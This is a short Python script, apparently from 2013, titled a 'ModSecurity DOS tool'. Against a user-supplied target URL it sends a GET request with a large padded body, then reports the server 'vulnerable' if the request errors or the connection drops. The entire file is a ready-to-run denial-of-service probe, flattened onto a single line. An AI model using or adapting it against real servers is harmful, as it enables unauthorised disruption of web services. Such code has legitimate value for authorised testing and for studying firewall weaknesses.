#!/usr/bin/env python3 #-*- coding: utf-8 -*- # # Created on Mar 29, 2013 # # @author: Younes JAAIDI <yjaaidi@shookalabs.com> # import argparse import http.client import logging import sys import urllib.request logger = logging.getLogger(__name__) logger.setLevel(logging.DEBUG) logger.addHandler(logging.StreamHandler(sys.stderr)) class ModSecurityDOSCheck(object): _DEFAULT_REQUEST_BODY_SIZE = 200 # KB _DEFAULT_CONCURRENCY = 100 _DEFAULT_USER_AGENT = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36" def __init__(self): self._request_counter = 0 self._status_message = None def main(self, args_list): args_object = self._parse_args(args_list) payload = "A" * args_object.request_body_size * 1024 request = urllib.request.Request(args_object.target_url, method = "GET", data = payload.encode('utf-8'), headers = {'Content-Type': 'text/random', 'User-Agent': self._DEFAULT_USER_AGENT}) if self._send_request(request): logger.info("Target seems to be vulnerable!!!") return 0 else: logger.info("Attack didn't work. Try increasing the 'REQUEST_BODY_SIZE'.") return 1 def _parse_args(self, args_list): parser = argparse.ArgumentParser(description="ModSecurity DOS tool.") parser.add_argument('-t', '--target-url', dest = 'target_url', required = True, help = "Target URL") parser.add_argument('-s', '--request-body-size', dest = 'request_body_size', default = self._DEFAULT_REQUEST_BODY_SIZE, type = int, help = "Request body size in KB") return parser.parse_args() def _send_request(self, request): try: urllib.request.urlopen(request) return False except (http.client.BadStatusLine, urllib.error.HTTPError): return True if __name__ == '__main__': sys.exit(ModSecurityDOSCheck().main(sys.argv))